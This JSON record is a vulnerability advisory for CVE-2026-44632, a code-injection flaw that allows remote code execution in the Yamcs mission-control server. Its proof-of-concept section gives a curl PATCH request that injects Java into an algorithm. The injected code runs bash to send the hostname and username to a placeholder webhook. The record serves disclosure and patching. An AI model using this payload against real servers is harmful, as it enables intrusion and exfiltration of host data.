{"id":"CVE-2026-44632","aliases":["GHSA-524g-x36v-9wm6"],"url":"https://o3.security/vulnerability/CVE-2026-44632","summary":"Yamcs: Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`","details":"### Summary\nA Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (`org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory`). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the `ChangeMissionDatabase` privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.\n\n### Proof of Concept (PoC)\nThe vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.\n\n**Prerequisites:**\n1. A running Yamcs instance with an active processor (e.g., `instance=myproject`, `processor=realtime`).\n2. An active authentication token for a user with the `SystemPrivilege.ChangeMissionDatabase` privilege.\n\n**Steps to Reproduce:**\n\n1. Send an authenticated HTTP `PATCH` request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., `copySunsensor`). The payload uses `java.lang.Runtime` to execute a reverse shell or ping an external webhook.\n\n```bash\ncurl -i -X PATCH \\\n  'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \\\n  -H 'Content-Type: application/json' \\\n  -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \\\n  -d '{\n    \"action\": \"SET\",\n    \"algorithm\": {\n      \"text\": \"try { java.lang.Runtime.getRuntime().exec(new String[]{\\\"bash\\\", \\\"-c\\\", \\\"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\\\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);\"\n    }\n  }'\n```\n\n2. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the `simulator.py` script to generate sun sensor data).\n3. The Yamcs server uses the Janino `SimpleCompiler` to compile the injected text into a Java class on the fly. Since no restrictive `ClassLoader` is applied, the payload is successfully compiled and executed.\n4. Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.\n\n### Impact\nThis vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.\n\n### Credits\nDiscovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.","published":"2026-07-16T16:05:28.554Z","modified":"2026-08-12T16:24:30.139074Z","cvss":{"score":9.1,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},"epss":{"score":0.01116,"percentile":0.63558,"asOf":"2026-08-24"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"Maven","name":"org.yamcs:yamcs-core","fixedVersion":"5.12.7"}],"fix":{"url":"https://github.com/yamcs/yamcs/commit/3c550348f866af4675d2ba4a51d8d12b7c7c6011","label":"yamcs/yamcs@3c55034"},"references":[{"type":"WEB","url":"https://github.com/yamcs/yamcs/releases/tag/yamcs-5.12.7"},{"type":"WEB","url":"https://github.com/yamcs/yamcs/releases/tag/yamcs-5.13.0"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/44xxx/CVE-2026-44632.json"},{"type":"ADVISORY","url":"https://github.com/yamcs/yamcs/security/advisories/GHSA-524g-x36v-9wm6"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44632"},{"type":"FIX","url":"https://github.com/yamcs/yamcs/commit/3c550348f866af4675d2ba4a51d8d12b7c7c6011"},{"type":"FIX","url":"https://github.com/yamcs/yamcs/commit/4ff8fda642ea8c3309a4d3f379aa77b763148992"},{"type":"PACKAGE","url":"https://github.com/yamcs/yamcs"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T16:24:30.139074Z"}}